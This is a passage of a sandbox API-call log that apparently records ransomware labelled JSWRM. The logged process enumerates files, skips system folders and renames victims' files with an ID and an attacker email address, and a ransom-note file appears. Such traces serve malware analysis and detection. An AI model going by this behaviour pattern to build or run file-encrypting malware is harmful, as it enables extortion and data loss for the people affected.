lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0067.847] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0067.847] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="IPSEventLogMsg.dll.mui", cchWideChar=22, lpMultiByteStr=0x240ef8, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="IPSEventLogMsg.dll.mui", lpUsedDefaultChar=0x0) returned 22 [0067.847] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0067.847] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0067.847] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="IPSEventLogMsg.dll.mui", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0067.847] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0067.847] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="IPSEventLogMsg.dll.mui", cchWideChar=22, lpMultiByteStr=0x241268, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="IPSEventLogMsg.dll.mui", lpUsedDefaultChar=0x0) returned 22 [0067.847] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0067.847] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d878 [0067.847] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235c80 | out: hHeap=0x1e0000) returned 1 [0067.847] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0067.847] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0067.847] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23db18 [0067.847] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\IPSEventLogMsg.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\ipseventlogmsg.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0067.848] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=10089634094897944) returned 0 [0067.848] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0067.848] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24e1e0 [0067.848] ReadFile (in: hFile=0xffffffff, lpBuffer=0x24e1e0, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24e1e0, lpNumberOfBytesRead=0x345e89c*=0x0, lpOverlapped=0x0) returned 0 [0067.848] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1e0 | out: hHeap=0x1e0000) returned 1 [0067.848] CloseHandle (hObject=0xffffffff) returned 1 [0067.848] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d338 [0067.848] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0067.848] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0067.848] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f8328, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0067.848] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0067.848] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0067.848] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0067.848] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a360 [0067.848] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a360, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0067.848] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a360 | out: hHeap=0x1e0000) returned 1 [0067.849] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235d38 [0067.849] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e110 [0067.849] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235d38 | out: hHeap=0x1e0000) returned 1 [0067.849] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0067.849] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\IPSEventLogMsg.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\ipseventlogmsg.dll.mui"), lpNewFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\IPSEventLogMsg.dll.mui.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\ipseventlogmsg.dll.mui.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 0 [0067.849] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e110 | out: hHeap=0x1e0000) returned 1 [0067.849] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d338 | out: hHeap=0x1e0000) returned 1 [0067.849] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23db18 | out: hHeap=0x1e0000) returned 1 [0067.849] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0067.849] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0067.849] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3da18a06, ftCreationTime.dwHighDateTime=0x1d2a058, ftLastAccessTime.dwLowDateTime=0x7dc8925d, ftLastAccessTime.dwHighDateTime=0x1d2a058, ftLastWriteTime.dwLowDateTime=0x80b88a00, ftLastWriteTime.dwHighDateTime=0x1d29faa, nFileSizeHigh=0x0, nFileSizeLow=0xa00, dwReserved0=0x0, dwReserved1=0x0, cFileName="IpsMigrationPlugin.dll.mui", cAlternateFileName="")) returned 1 [0067.849] lstrcmpiW (lpString1="IpsMigrationPlugin.dll.mui", lpString2=".") returned 1 [0067.849] lstrcmpiW (lpString1="IpsMigrationPlugin.dll.mui", lpString2="..") returned 1 [0067.849] lstrcmpiW (lpString1="IpsMigrationPlugin.dll.mui", lpString2="...") returned 1 [0067.849] lstrcmpiW (lpString1="IpsMigrationPlugin.dll.mui", lpString2="windows") returned -1 [0067.849] lstrcmpiW (lpString1="IpsMigrationPlugin.dll.mui", lpString2="recovery") returned -1 [0067.849] lstrcmpiW (lpString1="IpsMigrationPlugin.dll.mui", lpString2="perflogs") returned -1 [0067.849] lstrcmpiW (lpString1="IpsMigrationPlugin.dll.mui", lpString2="documents and settings") returned 1 [0067.850] lstrcmpiW (lpString1="IpsMigrationPlugin.dll.mui", lpString2="$RECYCLE.BIN") returned 1 [0067.850] lstrcmpiW (lpString1="IpsMigrationPlugin.dll.mui", lpString2="system volume information") returned -1 [0067.850] lstrcmpiW (lpString1="IpsMigrationPlugin.dll.mui", lpString2="msocache") returned -1 [0067.850] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dec0 [0067.850] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="IpsMigrationPlugin.dll.mui", cchWideChar=26, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0067.850] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0067.850] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="IpsMigrationPlugin.dll.mui", cchWideChar=26, lpMultiByteStr=0x241330, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="IpsMigrationPlugin.dll.mui", lpUsedDefaultChar=0x0) returned 26 [0067.850] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dec0 | out: hHeap=0x1e0000) returned 1 [0067.850] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dec0 [0067.850] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="IpsMigrationPlugin.dll.mui", cchWideChar=26, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0067.850] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0067.850] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="IpsMigrationPlugin.dll.mui", cchWideChar=26, lpMultiByteStr=0x240ef8, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="IpsMigrationPlugin.dll.mui", lpUsedDefaultChar=0x0) returned 26 [0067.850] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dec0 | out: hHeap=0x1e0000) returned 1 [0067.850] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236690 [0067.850] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d878 | out: hHeap=0x1e0000) returned 1 [0067.850] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0067.850] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0067.850] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2360d0 [0067.850] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\IpsMigrationPlugin.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\ipsmigrationplugin.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0067.850] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=9964392848515280) returned 0 [0067.850] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0067.850] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24e1e0 [0067.850] ReadFile (in: hFile=0xffffffff, lpBuffer=0x24e1e0, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24e1e0, lpNumberOfBytesRead=0x345e89c*=0x0, lpOverlapped=0x0) returned 0 [0067.850] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1e0 | out: hHeap=0x1e0000) returned 1 [0067.850] CloseHandle (hObject=0xffffffff) returned 1 [0067.850] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235f60 [0067.850] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0067.850] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0067.850] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f8328, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0067.851] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0067.851] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0067.851] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0067.851] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a288 [0067.851] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a288, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0067.851] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a288 | out: hHeap=0x1e0000) returned 1 [0067.851] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x1fc808 [0067.851] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23fa98 [0067.851] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0067.851] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0067.851] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\IpsMigrationPlugin.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\ipsmigrationplugin.dll.mui"), lpNewFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\IpsMigrationPlugin.dll.mui.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\ipsmigrationplugin.dll.mui.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 0 [0067.851] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23fa98 | out: hHeap=0x1e0000) returned 1 [0067.851] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235f60 | out: hHeap=0x1e0000) returned 1 [0067.851] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2360d0 | out: hHeap=0x1e0000) returned 1 [0067.851] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0067.851] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0067.851] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x98a1d507, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0xd1af9c24, ftLastAccessTime.dwHighDateTime=0x1d2a058, ftLastWriteTime.dwLowDateTime=0xd1af9c24, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x30d3a, dwReserved0=0x0, dwReserved1=0x0, cFileName="join.avi", cAlternateFileName="")) returned 1 [0067.851] lstrcmpiW (lpString1="join.avi", lpString2=".") returned 1 [0067.851] lstrcmpiW (lpString1="join.avi", lpString2="..") returned 1 [0067.851] lstrcmpiW (lpString1="join.avi", lpString2="...") returned 1 [0067.851] lstrcmpiW (lpString1="join.avi", lpString2="windows") returned -1 [0067.851] lstrcmpiW (lpString1="join.avi", lpString2="recovery") returned -1 [0067.851] lstrcmpiW (lpString1="join.avi", lpString2="perflogs") returned -1 [0067.851] lstrcmpiW (lpString1="join.avi", lpString2="documents and settings") returned 1 [0067.851] lstrcmpiW (lpString1="join.avi", lpString2="$RECYCLE.BIN") returned 1 [0067.851] lstrcmpiW (lpString1="join.avi", lpString2="system volume information") returned -1 [0067.851] lstrcmpiW (lpString1="join.avi", lpString2="msocache") returned -1 [0067.851] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0067.851] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="join.avi", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0067.851] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="join.avi", cchWideChar=8, lpMultiByteStr=0x345ebd8, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="join.avi", lpUsedDefaultChar=0x0) returned 8 [0067.852] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0067.852] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0067.852] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="join.avi", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0067.852] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="join.avi", cchWideChar=8, lpMultiByteStr=0x345eba8, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="join.avi", lpUsedDefaultChar=0x0) returned 8 [0067.852] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0067.852] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0067.852] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236690 | out: hHeap=0x1e0000) returned 1 [0067.852] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0067.852] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0067.852] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0067.852] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\join.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\join.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0067.852] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=10049536280073920) returned 0 [0067.852] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0067.852] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24e1e0 [0067.852] ReadFile (in: hFile=0xffffffff, lpBuffer=0x24e1e0, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24e1e0, lpNumberOfBytesRead=0x345e89c*=0x0, lpOverlapped=0x0) returned 0 [0067.852] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1e0 | out: hHeap=0x1e0000) returned 1 [0067.852] CloseHandle (hObject=0xffffffff) returned 1 [0067.852] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0067.852] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0067.852] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0067.852] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f8328, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0067.852] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0067.852] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0067.852] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0067.852] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2a0 [0067.852] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2a0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0067.852] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2a0 | out: hHeap=0x1e0000) returned 1 [0067.852] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x1f10b0 [0067.852] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0067.853] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f10b0 | out: hHeap=0x1e0000) returned 1 [0067.853] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x140) returned 0x1ff448 [0067.853] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0067.853] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0067.853] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\join.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\join.avi"), lpNewFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\join.avi.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\join.avi.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 0 [0067.853] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1ff448 | out: hHeap=0x1e0000) returned 1 [0067.853] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0067.853] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0067.853] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1f169b67, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x1f169b67, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x1f169b67, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x0, dwReserved1=0x0, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0067.853] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0067.853] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0067.853] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0067.853] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0067.853] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0067.853] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0067.853] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0067.853] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0067.853] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0067.853] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0067.853] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0067.853] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0067.853] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241380 [0067.853] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241380, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0067.853] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0067.853] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0067.853] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0067.853] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0067.853] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241268, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0067.853] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0067.853] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cf48 [0067.853] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0067.853] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: 